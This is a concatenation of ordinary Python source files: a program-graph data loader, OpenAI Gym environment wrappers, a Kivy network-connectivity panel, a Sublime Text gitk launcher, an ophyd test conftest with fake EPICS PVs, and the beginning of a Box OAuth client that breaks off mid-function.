self.min_graph_count = min_graph_count
self.max_graph_count = max_graph_count
self.data_flow_step_max = data_flow_step_max
self.seed = seed
self.logfile = logfile
self.use_cdfg = use_cdfg
self.require_inst2vec = require_inst2vec
# The number of graphs that have been skipped.
self.skip_count = 0
# For every file that a graph loader reads, there is the possibility that
# the contents of the file are never used, such as in the case of an empty
# graph, or a features file where all of the features are excluded. We keep
# track of these useless files so that if we ever need to read them again
# we know that we can skip them and save ourselves a disk access.
self._excluded_graph_files = set()
self._outq = Queue(maxsize=max_queue_size)
self._thread = threading.Thread(target=self._Worker)
self._thread.start()
self._stopped = False
def Stop(self):
if self._stopped:
return
self._stopped = True
# Read whatever's left in the queue so the worker thread can finish.
while self._thread.is_alive():
if self._outq.get(block=True) is not None:
break
self._thread.join()
def __iter__(
self,
) -> Iterable[
Tuple[
program_graph_pb2.ProgramGraph,
program_graph_features_pb2.ProgramGraphFeatures,
]
]:
value = self._outq.get(block=True)
while value is not None:
yield value
value = self._outq.get(block=True)
self._thread.join()
def _Worker(self):
"""Threaded graph reader."""
graph_files = list(self.graph_path.iterdir())
app.Log(
2, "Enumerated %s graph files to load", humanize.Commas(len(graph_files))
)
graph_count = 0
while not self.min_graph_count or graph_count < self.min_graph_count:
# Strip any graph files that we have earmarked for ignoring.
graph_files = [
f for f in graph_files if f not in self._excluded_graph_files
]
# We may have run out of files.
if not graph_files:
self._Done(graph_count)
return
if self.seed:
# If we are setting a reproducible seed, first sort the list of files
# since iterdir() order is undefined, then seed the RNG for the
# shuffle.
graph_files = sorted(graph_files, key=lambda x: x.name)
# Change the seed so that on the next execution of this loop we will
# choose a different random ordering.
self.seed += 1
random.Random(self.seed).shuffle(graph_files)
for graph_path in graph_files:
if self._stopped:
break
stem = graph_path.name[: -len("ProgramGraph.pb")]
name = f"{stem}ProgramGraphFeaturesList.pb"
features_path = self.labels_path / name
# There is no guarantee that we have generated features for this
# program graph, so we check for its existence. As a *very* defensive
# measure, we also check for the existence of the graph file that we
# enumerated at the start of this function. This check can be removed
# later, it is only useful during development when you might be
# modifying the dataset at the same time as having test jobs running.
if not graph_path.is_file() or not features_path.is_file():
self.skip_count += 1
continue
# Read the graph from disk, maybe performing a cheeky wee conversion
# to CDFG format.
app.Log(3, "Read %s", features_path)
if self.use_cdfg:
graph = cdfg.FromProgramGraphFile(graph_path)
else:
graph = pbutil.FromFile(graph_path, program_graph_pb2.ProgramGraph())
if not graph:
app.Log(2, "Failed to load graph %s", graph_path)
self._excluded_graph_files.add(graph_path)
continue
# Skip empty graphs.
if not len(graph.node) or len(graph.node) > FLAGS.max_graph_node_count:
app.Log(
2,
"Graph node count %s is not in range (1,%s]",
len(graph.node),
FLAGS.max_graph_node_count,
)
self._excluded_graph_files.add(graph_path)
continue
# Skip a graph without inst2vec
if self.require_inst2vec and not len(
graph.features.feature["inst2vec_annotated"].int64_list.value
):
app.Log(2, "Skipping graph without inst2vec annotations")
continue
features_list = pbutil.FromFile(
features_path, program_graph_features_pb2.ProgramGraphFeaturesList()
)
# Iterate over the features list to yield <graph, features> pairs.
skipped_all_features = True
for j, features in enumerate(features_list.graph):
step_count_feature = features.features.feature[
"data_flow_step_count"
].int64_list.value
step_count = step_count_feature[0] if len(step_count_feature) else 0
if self.data_flow_step_max and step_count > self.data_flow_step_max:
self.skip_count += 1
app.Log(
3,
"Skipped graph with data_flow_step_count %d > %d "
"(skipped %d / %d, %.2f%%)",
step_count,
self.data_flow_step_max,
self.skip_count,
(graph_count + self.skip_count),
(self.skip_count / (graph_count + self.skip_count)) * 100,
)
continue
graph_count += 1
if self.logfile:
self.logfile.write(f"{features_path} {j}\n")
self._outq.put((graph, features), block=True)
skipped_all_features = False
if self.max_graph_count and graph_count >= self.max_graph_count:
app.Log(2, "Stopping after reading %d graphs", graph_count)
self._Done(graph_count)
return
if skipped_all_features:
self._excluded_graph_files.add(graph_path)
self._Done(graph_count)
def _Done(self, graph_count: int) -> None:
if self._excluded_graph_files:
app.Log(
2,
"Graph loader loaded %s graphs. %s files were ignored",
humanize.Commas(graph_count),
humanize.Commas(len(self._excluded_graph_files)),
)
self._outq.put(None)
if self.logfile:
self.logfile.close()
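# --- Hedged usage sketch (added for illustration; the dataset path and analysis name
# are assumptions, and epoch_pb2.TRAIN is assumed to be the training-split enum value) ---
def _example_iterate_graphs():
    loader = DataflowGraphLoader(
        path=pathlib.Path("/tmp/dataflow_dataset"),
        epoch_type=epoch_pb2.TRAIN,
        analysis="reachability",
        max_graph_count=10,
    )
    try:
        # Each item is a <ProgramGraph, ProgramGraphFeatures> pair produced by the
        # background worker thread.
        for graph, _features in loader:
            print("loaded graph with", len(graph.node), "nodes")
    finally:
        # Stop() drains the queue so the worker thread can terminate cleanly.
        loader.Stop()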
|
wrappers.py
|
# Copyright 2017 The TensorFlow Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrappers for OpenAI Gym environments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import multiprocessing
import sys
import traceback
import gym
import gym.spaces
import numpy as np
import tensorflow as tf
class AutoReset(object):
"""Automatically reset environment when the episode is done."""
def __init__(self, env):
self._env = env
self._done = True
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._done:
observ, reward, done, info = self._env.reset(), 0.0, False, {}
else:
observ, reward, done, info = self._env.step(action)
self._done = done
return observ, reward, done, info
def reset(self):
self._done = False
return self._env.reset()
class ActionRepeat(object):
"""Repeat the agent action multiple steps."""
def __init__(self, env, amount):
self._env = env
self._amount = amount
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._amount and not done:
observ, reward, done, info = self._env.step(action)
total_reward += reward
current_step += 1
return observ, total_reward, done, info
class RandomStart(object):
"""Perform random number of random actions at the start of the episode."""
def __init__(self, env, max_steps):
self._env = env
self._max_steps = max_steps
def __getattr__(self, name):
return getattr(self._env, name)
def reset(self):
observ = self._env.reset()
random_steps = np.random.randint(0, self._max_steps)
for _ in range(random_steps):
action = self._env.action_space.sample()
observ, unused_reward, done, unused_info = self._env.step(action)
if done:
tf.logging.warning('Episode ended during random start.')
return self.reset()
return observ
class FrameHistory(object):
"""Augment the observation with past observations."""
def __init__(self, env, past_indices, flatten):
"""Augment the observation with past observations.
Implemented as a Numpy ring buffer holding the necessary past observations.
Args:
env: OpenAI Gym environment to wrap.
past_indices: List of non-negative integers indicating the time offsets
from the current time step of observations to include.
flatten: Concatenate the past observations rather than stacking them.
Raises:
KeyError: The current observation is not included in the indices.
"""
if 0 not in past_indices:
raise KeyError('Past indices should include 0 for the current frame.')
self._env = env
self._past_indices = past_indices
self._step = 0
self._buffer = None
self._capacity = max(past_indices) + 1
self._flatten = flatten
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
low = self._env.observation_space.low
high = self._env.observation_space.high
low = np.repeat(low[None, ...], len(self._past_indices), 0)
high = np.repeat(high[None, ...], len(self._past_indices), 0)
if self._flatten:
low = np.reshape(low, (-1,) + low.shape[2:])
high = np.reshape(high, (-1,) + high.shape[2:])
return gym.spaces.Box(low, high)
def step(self, action):
observ, reward, done, info = self._env.step(action)
self._step += 1
self._buffer[self._step % self._capacity] = observ
observ = self._select_frames()
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
self._buffer = np.repeat(observ[None, ...], self._capacity, 0)
self._step = 0
return self._select_frames()
def _select_frames(self):
indices = [
(self._step - index) % self._capacity for index in self._past_indices]
observ = self._buffer[indices]
if self._flatten:
observ = np.reshape(observ, (-1,) + observ.shape[2:])
return observ
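# --- Hedged usage sketch (added for illustration; the environment id is an assumption) ---
# FrameHistory keeps a ring buffer of past observations; with past_indices=[0, 1, 3]
# each returned observation stacks the current frame with those from 1 and 3 steps ago.
def _example_frame_history():
    env = FrameHistory(gym.make('CartPole-v0'), past_indices=[0, 1, 3], flatten=False)
    observ = env.reset()  # buffer starts as copies of the first frame
    observ, reward, done, info = env.step(env.action_space.sample())
    return observ.shape   # leading dimension equals len(past_indices)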
class FrameDelta(object):
"""Convert the observation to a difference from the previous observation."""
def __init__(self, env):
self._env = env
self._last = None
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
low = self._env.observation_space.low
high = self._env.observation_space.high
low, high = low - high, high - low
return gym.spaces.Box(low, high)
def step(self, action):
observ, reward, done, info = self._env.step(action)
delta = observ - self._last
self._last = observ
return delta, reward, done, info
def reset(self):
observ = self._env.reset()
self._last = observ
return observ
class RangeNormalize(object):
"""Normalize the specialized observation and action ranges to [-1, 1]."""
def __init__(self, env, observ=None, action=None):
self._env = env
self._should_normalize_observ = (
observ is not False and self._is_finite(self._env.observation_space))
if observ is True and not self._should_normalize_observ:
raise ValueError('Cannot normalize infinite observation range.')
if observ is None and not self._should_normalize_observ:
tf.logging.info('Not normalizing infinite observation range.')
self._should_normalize_action = (
action is not False and self._is_finite(self._env.action_space))
if action is True and not self._should_normalize_action:
raise ValueError('Cannot normalize infinite action range.')
if action is None and not self._should_normalize_action:
tf.logging.info('Not normalizing infinite action range.')
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
space = self._env.observation_space
if not self._should_normalize_observ:
return space
low, high = -np.ones(space.shape), np.ones(space.shape)
return gym.spaces.Box(low, high)
@property
def action_space(self):
space = self._env.action_space
if not self._should_normalize_action:
return space
low, high = -np.ones(space.shape), np.ones(space.shape)
return gym.spaces.Box(low, high)
def step(self, action):
if self._should_normalize_action:
action = self._denormalize_action(action)
observ, reward, done, info = self._env.step(action)
if self._should_normalize_observ:
observ = self._normalize_observ(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
if self._should_normalize_observ:
observ = self._normalize_observ(observ)
return observ
def _denormalize_action(self, action):
min_ = self._env.action_space.low
max_ = self._env.action_space.high
action = (action + 1) / 2 * (max_ - min_) + min_
return action
def _normalize_observ(self, observ):
min_ = self._env.observation_space.low
max_ = self._env.observation_space.high
observ = 2 * (observ - min_) / (max_ - min_) - 1
return observ
def _is_finite(self, space):
return np.isfinite(space.low).all() and np.isfinite(space.high).all()
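# --- Hedged illustration (added; not part of the original wrappers) ---
# RangeNormalize maps [low, high] linearly onto [-1, 1] via
#   normalized = 2 * (x - low) / (high - low) - 1
# and _denormalize_action applies the inverse. A quick numeric check:
def _example_range_normalize_math():
    low, high = np.array([0.0, -5.0]), np.array([10.0, 5.0])
    x = np.array([5.0, 0.0])
    normalized = 2 * (x - low) / (high - low) - 1        # -> [0.0, 0.0]
    restored = (normalized + 1) / 2 * (high - low) + low  # inverse mapping
    return np.allclose(restored, x)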
class ClipAction(object):
"""Clip out of range actions to the action space of the environment."""
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
shape = self._env.action_space.shape
low, high = -np.inf * np.ones(shape), np.inf * np.ones(shape)
return gym.spaces.Box(low, high)
def step(self, action):
action_space = self._env.action_space
action = np.clip(action, action_space.low, action_space.high)
return self._env.step(action)
class LimitDuration(object):
"""End episodes after specified number of steps."""
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
self._step = None
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ExternalProcess(object):
"""Step environment in a separate process for lock free paralellism."""
# Message types for communication via the pipe.
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
def __init__(self, constructor):
"""Step environment in a separate process for lock free parallelism.
The environment will be created in the external process by calling the
specified callable. This can be an environment class, or a function
creating the environment and potentially wrapping it. The returned
environment should not access global variables.
Args:
constructor: Callable that creates and returns an OpenAI gym environment.
Attributes:
observation_space: The cached observation space of the environment.
action_space: The cached action space of the environment.
"""
self._conn, conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__('observation_space')
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
"""Asynchronously call a method of the external environment.
Args:
name: Name of the method to call.
*args: Positional arguments to forward to the method.
**kwargs: Keyword arguments to forward to the method.
Returns:
Promise object that blocks and provides the return value when called.
"""
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
Transition tuple when blocking, otherwise callable that returns the
transition tuple.
"""
promise = self.call('step', action)
if blocking:
return promise()
else:
return promise
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
promise = self.call('reset')
if blocking:
return promise()
else:
return promise
def _receive(self):
"""Wait for a message from the worker process and return its payload.
Raises:
Exception: An exception was raised inside the worker process.
KeyError: The received message is of an unknown type.
Returns:
Payload object of the message.
"""
message, payload = self._conn.recv()
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, constructor, conn):
"""The process waits for actions and sends back environment results.
Args:
constructor: Constructor for the OpenAI Gym environment.
conn: Connection for communication to the main process.
Raises:
KeyError: When receiving a message of unknown type.
"""
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception: # pylint: disable=broad-except
stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))
tf.logging.error('Error in environment process: {}'.format(stacktrace))
conn.send((self._EXCEPTION, stacktrace))
conn.close()
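# Added illustration (not part of the original module): a minimal sketch of
# driving ExternalProcess through the promise-based step/reset API documented
# above. The gym environment id 'CartPole-v1' and the helper name are
# assumptions made only for this example.
def _example_external_process_rollout(num_steps=10):
  """Step two external environments in lock-step using non-blocking calls."""
  envs = [ExternalProcess(lambda: gym.make('CartPole-v1')) for _ in range(2)]
  observs = [env.reset() for env in envs]
  for _ in range(num_steps):
    # Request all steps first, then resolve the returned promises.
    promises = [env.step(env.action_space.sample(), blocking=False)
                for env in envs]
    results = [promise() for promise in promises]
    observs = [observ for observ, _, _, _ in results]
  for env in envs:
    env.close()
  return observs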
class ConvertTo32Bit(object):
"""Convert data types of an OpenAI Gym environment to 32 bit."""
def __init__(self, env):
"""Convert data types of an OpenAI Gym environment to 32 bit.
Args:
env: OpenAI Gym environment.
"""
self._env = env
def __getattr__(self, name):
"""Forward unimplemented attributes to the original environment.
Args:
name: Attribute that was accessed.
Returns:
Value behind the attribute name in the wrapped environment.
"""
return getattr(self._env, name)
def step(self, action):
"""Forward action to the wrapped environment.
Args:
action: Action to apply to the environment.
Raises:
ValueError: Invalid action.
Returns:
Converted observation, converted reward, done flag, and info object.
"""
observ, reward, done, info = self._env.step(action)
observ = self._convert_observ(observ)
reward = self._convert_reward(reward)
return observ, reward, done, info
def reset(self):
"""Reset the environment and convert the resulting observation.
Returns:
Converted observation.
"""
observ = self._env.reset()
observ = self._convert_observ(observ)
return observ
def _convert_observ(self, observ):
"""Convert the observation to 32 bits.
Args:
observ: Numpy observation.
Raises:
ValueError: Observation contains infinite values.
Returns:
Numpy observation with 32-bit data type.
"""
if not np.isfinite(observ).all():
raise ValueError('Infinite observation encountered.')
if observ.dtype == np.float64:
return observ.astype(np.float32)
if observ.dtype == np.int64:
return observ.astype(np.int32)
return observ
def _convert_reward(self, reward):
"""Convert the reward to 32 bits.
Args:
reward: Numpy reward.
Raises:
ValueError: Rewards contain infinite values.
Returns:
Numpy reward with 32-bit data type.
"""
if not np.isfinite(reward).all():
raise ValueError('Infinite reward encountered.')
return np.array(reward, dtype=np.float32)
class CacheSpaces(object):
"""Cache observation and action space to not recompute them repeatedly."""
def __init__(self, env):
"""Cache observation and action space to not recompute them repeatedly.
Args:
env: OpenAI Gym environment.
"""
self._env = env
self._observation_space = self._env.observation_space
self._action_space = self._env.action_space
def __getattr__(self, name):
"""Forward unimplemented attributes to the original environment.
Args:
name: Attribute that was accessed.
Returns:
Value behind the attribute name in the wrapped environment.
"""
return getattr(self._env, name)
@property
def observation_space(self):
return self._observation_space
@property
def action_space(self):
return self._action_space
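# Added illustration (not part of the original module): one way the wrappers
# above might be composed. The environment id 'Pendulum-v0' and the duration
# are placeholder assumptions.
def _example_wrapped_env():
  """Build a continuous-control env with action clipping, a step limit,
  32-bit casts and cached spaces; a sketch only."""
  env = gym.make('Pendulum-v0')
  env = ClipAction(env)
  env = LimitDuration(env, duration=200)
  env = ConvertTo32Bit(env)
  env = CacheSpaces(env)
  return env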
|
connection_panel.py
|
#
# Copyright (C) 2020 Adam Meily
#
# This file is subject to the terms and conditions defined in the file 'LICENSE', which is part of
# this source code package.
#
import threading
import logging
import socket
from typing import List
from kivy.uix.boxlayout import BoxLayout
from kivy.clock import Clock
from kivy.event import EventDispatcher
from kivy.logger import Logger
from dns.resolver import Resolver
from .bool_sensor import BoolSensor
from .ping import ping
from .config import config
class ConnectionPanel(BoxLayout, EventDispatcher):
def __init__(self, **kwargs):
BoxLayout.__init__(self, orientation='horizontal', **kwargs)
EventDispatcher.__init__(self)
# ping local gateway - bolt
# ping external gateway - external-link
# dns query, icanhazip - person
# icanhazip - get external IP - cloud
self.local_gateway_sensor = BoolSensor(text='Local Gateway', image='bolt.png')
self.external_gateway_sensor = BoolSensor(text='External Gateway',
image='external-link.png')
self.external_dns_sensor = BoolSensor(text='External DNS', image='person.png')
self.local_dns_sensor = BoolSensor(text='Local DNS', image='people.png')
self.add_widget(self.local_gateway_sensor)
self.add_widget(self.external_gateway_sensor)
self.add_widget(self.external_dns_sensor)
self.add_widget(self.local_dns_sensor)
self.register_event_type('on_sensor_done')
self.state = 'unknown'
def run_sensors(self, reset: bool = False):
if reset:
self.local_gateway_sensor.state = 'unknown'
self.external_gateway_sensor.state = 'unknown'
self.external_dns_sensor.state = 'unknown'
self.local_dns_sensor.state = 'unknown'
thread = threading.Thread(target=self._run_sensors)
thread.start()
def _run_sensors(self):
Logger.info('Connection: running connection sensors')
if not ping(config.local_gateway):
Logger.error('Connection: local gateway ping failed')
self.mark_bad(self.local_gateway_sensor, self.external_gateway_sensor,
self.external_dns_sensor, self.local_dns_sensor)
return
Logger.info('Connection: local gateway ping successful')
self.local_gateway_sensor.state = 'good'
if not ping(config.external_gateway):
Logger.info('Connection: external gateway ping failed')
self.mark_bad(self.external_gateway_sensor, self.external_dns_sensor,
self.local_dns_sensor)
return
Logger.info('Connection: external gateway ping successful')
self.external_gateway_sensor.state = 'good'
resolver = Resolver(configure=False)
resolver.nameservers = list(config.external_dns)
try:
ans = resolver.resolve('google.com.')
icanhazip = str(ans[0])
        except Exception:
Logger.exception('Connection: external dns query failed')
self.mark_bad(self.external_dns_sensor, self.local_dns_sensor)
return
Logger.info('Connection: external dns query successful')
self.external_dns_sensor.state = 'good'
resolver = Resolver(configure=False)
resolver.nameservers = list(config.local_dns)
try:
ans = resolver.resolve('google.com.')
icanhazip = str(ans[0])
        except Exception:
Logger.exception('Connection: internal dns query failed')
self.mark_bad(self.local_dns_sensor)
return
Logger.info('Connection: internal dns query successful')
self.local_dns_sensor.state = 'good'
self.state = 'good'
self.dispatch('on_sensor_done')
def mark_bad(self, *sensors: List[BoolSensor]) -> None:
for sensor in sensors:
sensor.state = 'bad'
self.state = 'failed'
self.dispatch('on_sensor_done')
def on_sensor_done(self):
pass
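# Added illustration (not part of the original module): a sketch of wiring the
# panel into a parent layout and reacting to the aggregated result. The parent
# widget and callback names are assumptions.
def _example_wire_connection_panel(parent_layout):
    """Attach a ConnectionPanel, run its sensors and log the overall state."""
    panel = ConnectionPanel()

    def _on_done(instance):
        Logger.info('Connection: sensors finished with state %s', instance.state)

    panel.bind(on_sensor_done=_on_done)
    parent_layout.add_widget(panel)
    panel.run_sensors(reset=True)
    return panel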
|
gitk.py
|
# coding: utf-8
import os
import subprocess
import threading
import sublime
from sublime_plugin import WindowCommand
from .util import get_executable
from .cmd import GitCmd
EXECUTABLE_ERROR = ("Executable '{bin}' was not found in PATH. Current PATH:\n\n"
"{path}")
class GitGitkCommand(WindowCommand, GitCmd):
"""
Documentation coming soon.
"""
def run(self):
cwd = self.get_repo(silent=False)
if not cwd:
return
cmd = get_executable('gitk', ['gitk'])
startupinfo = self.startupinfo()
environment = self.env()
def async_inner():
try:
os.chdir(cwd)
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
startupinfo=startupinfo,
env=environment)
proc.wait()
except OSError:
path = "\n".join(os.environ.get('PATH', '').split(':'))
msg = EXECUTABLE_ERROR.format(bin='gitk', path=path)
sublime.error_message(msg)
thread = threading.Thread(target=async_inner)
thread.start()
|
conftest.py
|
import sys
import time
import random
import logging
import pytest
import threading
from functools import wraps
import weakref
import numpy as np
import numpy.testing
from ophyd import get_cl, set_cl
logger = logging.getLogger(__name__)
_FAKE_PV_LIST = []
class FakeEpicsPV(object):
_connect_delay = (0.05, 0.1)
_update_rate = 0.1
fake_values = (0.1, 0.2, 0.3)
_pv_idx = 0
auto_monitor = True
def __init__(self, pvname, form=None,
callback=None, connection_callback=None,
auto_monitor=True, enum_strs=None,
**kwargs):
self.callbacks = dict()
global _FAKE_PV_LIST
_FAKE_PV_LIST.append(self)
self._pvname = pvname
self._connection_callback = connection_callback
self._form = form
self._auto_monitor = auto_monitor
self._value = self.fake_values[0]
self._connected = False
self._running = True
self.enum_strs = enum_strs
FakeEpicsPV._pv_idx += 1
self._idx = FakeEpicsPV._pv_idx
self._update = True
self._lock = threading.Lock()
self._thread = threading.Thread(target=self._update_loop)
self._thread.daemon = True
self._thread.start()
if callback:
self.add_callback(callback)
def __del__(self):
self.clear_callbacks()
self._running = False
try:
self._thread.join()
self._thread = None
except Exception:
pass
def get_timevars(self):
pass
def get_ctrlvars(self):
pass
@property
def connected(self):
return self._connected
def wait_for_connection(self, timeout=None):
if self._pvname in ('does_not_connect', ):
return False
while not self._connected:
time.sleep(0.05)
return True
def _update_loop(self):
time.sleep(random.uniform(*self._connect_delay))
if self._connection_callback is not None:
self._connection_callback(pvname=self._pvname, conn=True, pv=self)
if self._pvname in ('does_not_connect', ):
return
last_value = None
while self._running:
with self._lock:
if self._update:
self._value = random.choice(self.fake_values)
if self._value != last_value:
sys.stdout.flush()
self.run_callbacks()
last_value = self._value
time.sleep(self._update_rate)
self._connected = True
time.sleep(0.01)
@property
def lower_ctrl_limit(self):
return min(self.fake_values)
@property
def upper_ctrl_limit(self):
return max(self.fake_values)
def run_callbacks(self):
for index in sorted(list(self.callbacks.keys())):
if not self._running:
break
self.run_callback(index)
def run_callback(self, index):
fcn = self.callbacks[index]()
if fcn is None:
self.remove_callback(index)
return
kwd = dict(pvname=self._pvname,
count=1,
nelm=1,
type=None,
typefull=None,
ftype=None,
access='rw',
chid=self._idx,
read_access=True,
write_access=True,
value=self.value,
)
kwd['cb_info'] = (index, self)
if hasattr(fcn, '__call__'):
fcn(**kwd)
def add_callback(self, callback=None, index=None, run_now=False,
with_ctrlvars=True):
if hasattr(callback, '__call__'):
if index is None:
index = 1
if len(self.callbacks) > 0:
index = 1 + max(self.callbacks.keys())
try:
self.callbacks[index] = weakref.WeakMethod(callback)
except TypeError:
self.callbacks[index] = weakref.ref(callback)
if run_now:
if self.connected:
self.run_callback(index)
return index
def remove_callback(self, index=None):
self.callbacks.pop(index, None)
def clear_callbacks(self):
self.callbacks.clear()
@property
def precision(self):
return 0
@property
def units(self):
return str(None)
@property
def timestamp(self):
return time.time()
@property
def pvname(self):
return self._pvname
@property
def value(self):
return self._value
def __repr__(self):
return '<FakePV %s value=%s>' % (self._pvname, self.value)
def get(self, as_string=False, use_numpy=False,
use_monitor=False):
if as_string:
if isinstance(self.value, list):
if self.enum_strs:
return [self.enum_strs[_] for _ in self.value]
return list(self.value)
if isinstance(self.value, str):
return self.value
else:
if self.enum_strs:
return self.enum_strs[self.value]
return str(self.value)
elif use_numpy:
return np.array(self.value)
else:
return self.value
def put(self, value, wait=False, timeout=30.0,
use_complete=False, callback=None, callback_data=None):
with self._lock:
self._update = False
self._value = value
class FakeEpicsWaveform(FakeEpicsPV):
strings = ['abcd', 'efgh', 'ijkl']
fake_values = [[ord(c) for c in s] + [0]
for s in strings]
auto_monitor = False
form = 'time'
def _cleanup_fake_pvs():
pvs = list(_FAKE_PV_LIST)
del _FAKE_PV_LIST[:]
for pv in pvs:
pv.clear_callbacks()
pv._running = False
pv._connection_callback = None
for pv in pvs:
try:
pv._thread.join()
pv._thread = None
except Exception:
pass
def using_fake_epics_pv(fcn):
@wraps(fcn)
def wrapped(*args, **kwargs):
cl = get_cl()
get_pv_backup = cl.get_pv
def _fake_get_pv(pvname, form='time', connect=False,
                         context=False, timeout=5.0, **kw):
return FakeEpicsPV(pvname, form=form, **kw)
cl.get_pv = _fake_get_pv
try:
return fcn(*args, **kwargs)
finally:
cl.get_pv = get_pv_backup
_cleanup_fake_pvs()
return wrapped
def using_fake_epics_waveform(fcn):
@wraps(fcn)
def wrapped(*args, **kwargs):
cl = get_cl()
get_pv_backup = cl.get_pv
def _fake_get_pv(pvname, form='time', connect=False,
                         context=False, timeout=5.0, **kw):
return FakeEpicsWaveform(pvname, form=form, **kw)
cl.get_pv = _fake_get_pv
try:
return fcn(*args, **kwargs)
finally:
cl.get_pv = get_pv_backup
_cleanup_fake_pvs()
return wrapped
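# Added illustration (not part of the original fixtures): how a test can opt
# into the fake PV layer defined above. The PV name is an arbitrary assumption.
@using_fake_epics_pv
def _example_reads_fake_pv():
    """With the decorator active, cl.get_pv() hands back a FakeEpicsPV."""
    cl = get_cl()
    pv = cl.get_pv('XF:EXAMPLE{Fake}PV')
    pv.wait_for_connection()
    assert pv.get() in FakeEpicsPV.fake_values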
@pytest.fixture()
def hw():
from ophyd.sim import hw
return hw()
@pytest.fixture(params=['caproto', 'pyepics'], autouse=True)
def cl_selector(request):
cl_name = request.param
if cl_name == 'caproto':
pytest.importorskip('caproto')
elif cl_name == 'pyepics':
pytest.importorskip('epics')
set_cl(cl_name)
yield
set_cl()
class AssertTools:
@staticmethod
def assertEquals(a, b):
assert a == b
@staticmethod
def assertEqual(a, b):
assert a == b
@staticmethod
def assertNotEqual(a, b):
assert a != b
@staticmethod
def assertRaises(Etype, func, *args, **kwargs):
with pytest.raises(Etype):
func(*args, **kwargs)
@staticmethod
def assertIn(val, target):
assert val in target
@staticmethod
def assertIs(a, b):
assert a is b
@staticmethod
def assertTrue(v):
assert v
@staticmethod
def assertFalse(v):
assert not v
@staticmethod
def assertGreater(a, b):
assert a > b
@staticmethod
def assertAlmostEqual(a, b):
numpy.testing.assert_almost_equal(a, b)
@staticmethod
def skipTest(msg):
pytest.skip(msg)
|
box_client.py
|
from __future__ import print_function
from contextlib import contextmanager
from flask import Flask, request
from multiprocessing import Process, Queue
import os
import time
import subprocess
import json
from boxsdk import OAuth2
from boxsdk import Client
import logging
from StringIO import StringIO
# Remove logging from flask app
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
try:
basestring
except NameError:
basestring = str
@contextmanager
def with_flask_server(app):
'''
A context manager for a flask server that is run as a separate process.
The context manager returns a multiprocessing queue, which is the way we
pass the request arguments back from the HTTP handler to our oauth code.
'''
def child_main(q):
app.mp_queue = q
app.run(port=8080)
try:
q = Queue()
server = Process(target=child_main, args=(q,))
server.start()
yield q
finally:
server.terminate()
server.join()
def _config_get():
config_path = os.path.expanduser('~/.stopwatch-sync/config.json')
if not os.path.exists(os.path.dirname(config_path)):
os.makedirs(os.path.dirname(config_path))
if os.path.exists(config_path):
# HACK handle errors in JSON format?
with open(config_path, 'rb') as f:
return json.load(f)
else:
return {}
def _config_set(key, value):
config = _config_get()
config[key] = value
config_path = os.path.expanduser('~/.stopwatch-sync/config.json')
with open(config_path, 'wb') as f:
json.dump(config, f)
def _store_tokens(access_token, refresh_token):
_config_set('box_access_token', access_token)
_config_set('box_refresh_token', refresh_token)
def box_client():
config = _config_get()
if config.get('box_refresh_token') and config.get('box_access_token'):
oauth = OAuth2(
client_id=config.get('box_client_ID'),
client_secret=config.get('box_client_secret'),
store_tokens=_store_tokens,
access_token=config.get('box_access_token'),
refresh_token=config.get('box_refresh_token'),
)
else:
oauth = _oauth_flow()
return Client(oauth)
def _oauth_flow():
app = Flask(__name__)
@app.route('/stopwatch-box')
